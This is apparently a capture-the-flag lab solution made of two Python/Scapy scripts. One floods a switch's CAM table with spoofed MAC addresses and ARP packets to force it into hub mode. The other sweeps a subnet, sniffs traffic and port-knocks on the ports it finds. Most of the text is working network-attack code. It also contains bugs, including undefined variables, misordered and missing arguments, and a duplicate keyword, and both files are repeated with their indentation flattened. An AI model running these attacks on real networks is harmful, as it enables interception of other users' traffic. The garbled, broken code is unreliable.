donkey-hotei/cam_overflow.py

## cam_overflow.py
#!/usr/bin/python

# CAM Table Overflow is all about flooding a
# switches CAM table with a lot of fake MAC
# addresses to drive the switch into HUB mode.

from scapy.all import *
from random import randint
import subprocess
# import sys


def mac_generate():
    mac = [0x00, 0x16, 0x3e,
           randint(0x00, 0x7f),
           randint(0x00, 0xff),
           randint(0x00, 0xff)]
    return ":".join(map(lambda x: "%02x" % x, mac))


def ip_generate():
    return ".".join(map(str, (randint(0, 255)) for _ in range(4)))


def send_packet(src_mac, dst_mac, dst_ip, interface):
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp = ARP(op="who-has", psrc=src_ip, pdst=dst_ip,
              hwsrc=src_mac, hwdst="ff:ff:ff:ff:ff:ff")
    send(ether / arp, iface=interface)
    return


def spoof_mac(interface):
    subprocess.call(["ifconfig", interface, "down"])
    subprocess.call(["ifconfig", interface, "hw", "ether", mac_generate()])
    subprocess.call(["ifconfig", interface, "up"])
    return


def cam_overflow(src_iface, nmbr_pkts):
    src_mac = mac_generate()
    src_ip = ip_generate()
    dst_ip = ip_generate()
    for _ in range(nmbr_pkts):
        try:
            spoof_mac(src_iface)
            send_packet(src_mac, src_ip, dst_ip, src_iface)
        except:
            print("[!] Error: Can't send ARP packet.")
            return
        else:
            print("\n\n[*]" + src_mac + "> ff:ff:ff:ff:ff")
            print("\n   Who has " + dst_ip + "? Tell" + src_ip + "\n")
    print("\n\n[+] CAM Overflow completed using " +
          str(nmbr_pkts) + "packets\n")


if __name__ == '__main__':
    pass

## x.py
#!/usr/bin/python

# Scapy-Hunt solution code
from scapy.all import *
from cam_overflow import cam_overflow


def knock(ports, dst):
    """
    Knock on ports at given destination host.
    """
    print("[*] Knocking on ports " + str(ports))
    for dport in ports:
        ip = IP(dst=dst)
        SYN = ip / \
            TCP(dport=dport, flags="S", window=14600, options=[("MSS", 1408)])
        send(SYN)


if __name__ == '__main__':
    ans, uname = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") /
        ARP(pdst="10.5.0.0/24"), iface="tap0", timeout=2)
    cam_overflow()  # drive switch into hub mode
    packets = sniff(iface="tap0", filter="tcp and src 10.5.0.4",
                    prn=lambda p: p.summary(), iface="tap0", timeout=500)
    ports = set([p[TCP].dport for p in packets])
	#!/usr/bin/python

	# CAM Table Overflow is all about flooding a
	# switches CAM table with a lot of fake MAC
	# addresses to drive the switch into HUB mode.

	from scapy.all import *
	from random import randint
	import subprocess
	# import sys


	def mac_generate():
	mac = [0x00, 0x16, 0x3e,
	randint(0x00, 0x7f),
	randint(0x00, 0xff),
	randint(0x00, 0xff)]
	return ":".join(map(lambda x: "%02x" % x, mac))


	def ip_generate():
	return ".".join(map(str, (randint(0, 255)) for _ in range(4)))


	def send_packet(src_mac, dst_mac, dst_ip, interface):
	ether = Ether(dst="ff:ff:ff:ff:ff:ff")
	arp = ARP(op="who-has", psrc=src_ip, pdst=dst_ip,
	hwsrc=src_mac, hwdst="ff:ff:ff:ff:ff:ff")
	send(ether / arp, iface=interface)
	return


	def spoof_mac(interface):
	subprocess.call(["ifconfig", interface, "down"])
	subprocess.call(["ifconfig", interface, "hw", "ether", mac_generate()])
	subprocess.call(["ifconfig", interface, "up"])
	return


	def cam_overflow(src_iface, nmbr_pkts):
	src_mac = mac_generate()
	src_ip = ip_generate()
	dst_ip = ip_generate()
	for _ in range(nmbr_pkts):
	try:
	spoof_mac(src_iface)
	send_packet(src_mac, src_ip, dst_ip, src_iface)
	except:
	print("[!] Error: Can't send ARP packet.")
	return
	else:
	print("\n\n[*]" + src_mac + "> ff:ff:ff:ff:ff")
	print("\n Who has " + dst_ip + "? Tell" + src_ip + "\n")
	print("\n\n[+] CAM Overflow completed using " +
	str(nmbr_pkts) + "packets\n")


	if __name__ == '__main__':
	pass
	#!/usr/bin/python

	# Scapy-Hunt solution code
	from scapy.all import *
	from cam_overflow import cam_overflow


	def knock(ports, dst):
	"""
	Knock on ports at given destination host.
	"""
	print("[*] Knocking on ports " + str(ports))
	for dport in ports:
	ip = IP(dst=dst)
	SYN = ip / \
	TCP(dport=dport, flags="S", window=14600, options=[("MSS", 1408)])
	send(SYN)


	if __name__ == '__main__':
	ans, uname = srp(
	Ether(dst="ff:ff:ff:ff:ff:ff") /
	ARP(pdst="10.5.0.0/24"), iface="tap0", timeout=2)
	cam_overflow() # drive switch into hub mode
	packets = sniff(iface="tap0", filter="tcp and src 10.5.0.4",
	prn=lambda p: p.summary(), iface="tap0", timeout=500)
	ports = set([p[TCP].dport for p in packets])